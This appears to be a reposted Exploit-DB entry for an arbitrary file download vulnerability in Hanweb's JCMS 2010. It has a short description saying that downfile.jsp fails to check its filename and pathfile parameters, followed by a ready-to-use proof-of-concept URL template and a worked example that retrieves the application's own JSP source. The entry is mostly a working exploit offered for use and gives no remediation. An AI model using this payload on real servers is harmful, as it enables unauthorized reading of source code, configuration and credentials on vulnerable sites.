JCMS 2010 – File Download

• Exploit Database
• 38 阅读

• 作者： Beach
  日期： 2010-11-22
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/15596/

• #####################################################################################################
  #Title: JCMS 2010 File Download Vulnerability
  #Date:2010-11-22
  #Author:Beach
  #Team:http://www.linux520.com/
  #Vendor:http://www.hanweb.com/
  #Language:Java
  #Greetz:Brother
  #####################################################################################################
  [*]Description:
  
  In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input 
  So this vulnerability allows an attacker to download any files .
  #####################################################################################################
  [*]POC:
  
  http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name]
  #####################################################################################################
  [*]I.E:
  
  http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp
  #####################################################################################################